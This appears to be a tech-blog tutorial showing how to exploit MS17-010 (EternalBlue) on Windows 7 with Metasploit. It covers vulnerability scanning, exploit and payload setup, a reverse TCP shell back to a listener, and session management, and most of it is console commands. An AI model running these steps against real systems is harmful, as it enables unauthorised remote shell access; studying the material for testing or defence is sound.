Home > Tech > Content

Exploiting Windows 7 Systems Using Metasploit Framework

Tech May 15 1

Remote Command Execution on Windows 7 via MS17-010 Vulnerability

Core Workflow

Vulnerability Identification → Module Selection → Configuration → Exploitation

Module Discovery Commands

search CVE-2017-0143
show exploits
show payloads
show auxiliary

Module Configuraton

Display parameters:
show options
show targets
show encoders
show advanced
info module_name

Set parameters:
use exploit_name
set payload_name
set parameter_name value

Exploitation Commmands

exploit
run

Practical Implementation

Vulnerability Scanning Module

msf6 > search ms17-010
auxiliary/scanner/smb/smb_ms17_010

Load Scanner Module

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) >

Display Configuration Options

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Set Target Host

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.100

Verify Configuration

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
RHOSTS       192.168.1.100

Execute Vulnerability Scan

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

Exploit Module Discovery

msf6 > search ms17-010
exploit/windows/smb/ms17_010_eternalblue

Load Exploit Module

msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >

Configure Target Host

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100

View Compatible Targets

msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Payload Configuration

msf6 exploit(windows/smb/ms17_010_eternalblue) > search windows/shell
payload/windows/shell/reverse_tcp

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp

Set Listener Parameters

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.50 LPORT 5555
LHOST => 192.168.1.50 LPORT 5555

Launch Exploitation

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

Terminal Encoding Fix

C:\Windows\system32> chcp 65001

Session Management

Background Session Storage

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j

View Active Sessions

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions

Resume Specific Session

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 3

Background Session Preservasion

C:\Windows\system32> background
Background session 3? [y/N] y

Terminate Session

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -k 3
[*] Killing the following session(s): 3

Configuration Parameters Reference

Metasploit Attack Methodology

Identify CVE vulnerability
Locate corresponding exploit module
Configure module parameters
Deploy payload
Execute exploitation

Tags: Metasploit ms17-010 eternalblue

Back to List

Prev: FPGA-Based DDS Signal Generator: Design and Implementation

Next: Setting Up an ObjectARX Development Environment Manually

Understanding Strong and Weak References in Java

Strong References Strong reference are the most prevalent type of object referencing in Java. When an object has a strong reference pointing to it, the garbage collector will not reclaim its memory. F...

Comprehensive Guide to SSTI Explained with Payload Bypass Techniques

Introduction Server-Side Template Injection (SSTI) is a vulnerability in web applications where user input is improper handled within the template engine and executed on the server. This exploit can r...

Implement Image Upload Functionality for Django Integrated TinyMCE Editor

Django’s Admin panel is highly user-friendly, and pairing it with TinyMCE, an effective rich text editor, simplifies content management significantly. Combining the two is particular useful for bloggi...

Fading Coder

Exploiting Windows 7 Systems Using Metasploit Framework

Remote Command Execution on Windows 7 via MS17-010 Vulnerability

Core Workflow

Module Discovery Commands

Module Configuraton

Exploitation Commmands

Practical Implementation

Vulnerability Scanning Module

Load Scanner Module

Display Configuration Options

Set Target Host

Verify Configuration

Execute Vulnerability Scan

Exploit Module Discovery

Load Exploit Module

Configure Target Host

View Compatible Targets

Payload Configuration

Set Listener Parameters

Launch Exploitation

Terminal Encoding Fix

Session Management

Background Session Storage

View Active Sessions

Resume Specific Session

Background Session Preservasion

Terminate Session

Configuration Parameters Reference

Metasploit Attack Methodology

Related Articles

Understanding Strong and Weak References in Java

Comprehensive Guide to SSTI Explained with Payload Bypass Techniques

Implement Image Upload Functionality for Django Integrated TinyMCE Editor

Leave a Comment

Copyright © fadingcoder.top

Fading Coder

Exploiting Windows 7 Systems Using Metasploit Framework

Remote Command Execution on Windows 7 via MS17-010 Vulnerability

Core Workflow

Module Discovery Commands

Module Configuraton

Exploitation Commmands

Practical Implementation

Vulnerability Scanning Module

Load Scanner Module

Display Configuration Options

Set Target Host

Verify Configuration

Execute Vulnerability Scan

Exploit Module Discovery

Load Exploit Module

Configure Target Host

View Compatible Targets

Payload Configuration

Set Listener Parameters

Launch Exploitation

Terminal Encoding Fix

Session Management

Background Session Storage

View Active Sessions

Resume Specific Session

Background Session Preservasion

Terminate Session

Configuration Parameters Reference

Metasploit Attack Methodology

Related Articles

Understanding Strong and Weak References in Java

Comprehensive Guide to SSTI Explained with Payload Bypass Techniques

Implement Image Upload Functionality for Django Integrated TinyMCE Editor

Leave a CommentCancel Reply

Copyright © fadingcoder.top

Leave a Comment